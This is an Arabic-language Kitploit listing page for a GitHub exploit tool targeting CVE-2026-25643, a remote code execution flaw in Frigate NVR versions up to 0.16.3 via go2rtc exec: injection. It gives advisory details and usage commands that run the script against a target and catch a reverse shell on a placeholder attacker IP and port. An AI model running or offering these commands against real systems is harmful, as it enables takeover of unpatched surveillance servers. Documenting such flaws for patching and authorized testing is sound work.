Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25643-Frigate-RCE — إكسبلويت لثغرة RCE المُصادَق عليها في Frigate NVR عبر go2rtc exec: حقن البروتوكول، وأتمتة تنفيذ أوامر النظام، والتقاط قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/jduardo2704/cve-2026-25643-frigate-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعد
GitHubjduardo2704/cve-2026-25643-frigate-rce

CVE-2026-25643-Frigate-RCE

إكسبلويت لثغرة RCE المُصادَق عليها في Frigate NVR عبر go2rtc exec: حقن البروتوكول، وأتمتة تنفيذ أوامر النظام، والتقاط قشرة عكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
3منذ 6 أشهرلم تتم المراجعة بعد

CVE-2026-25643: Frigate NVR <= 0.16.3 RCE بعد المصادقة

عنوان الاستغلال: Frigate NVR <= 0.16.3 - تنفيذ التعليمات البرمجية عن بُعد بعد المصادقة
التاريخ: 2026-02-05
مؤلف الاستغلال: jduardo2704
الصفحة الرئيسية للبائع: https://frigate.video/
رابط البرنامج: https://github.com/blakeblackshear/frigate
الإصدار: <= 0.16.3
CVE: CVE-2026-25643 النشرة الأمنية: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x

الوصف

إصدارات Frigate حتى 0.16.3 معرّضة لتنفيذ التعليمات البرمجية عن بُعد (RCE) عبر إعداد go2rtc. يمكن للمهاجم الذي يمتلك وصولًا مصادقًا عليه (أو بدون مصادقة إذا كان المثيل مكشوفًا) حقن أوامر النظام في إعداد البث باستخدام بروتوكول exec:. يقوم هذا الاستغلال بأتمتة حقن الحمولة، ويعيد تشغيل الخدمة، ويلتقط الصدفة العكسية.

التثبيت

root@kitploit:~
pip install requests pyyaml

الاستخدام

وضع المصادقة:

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444

الوضع بدون مصادقة (إذا كان المثيل مكشوفًا):

root@kitploit:~
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444

إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية وللاختبارات الأمنية المصرح بها فقط.

تنزيل الأداة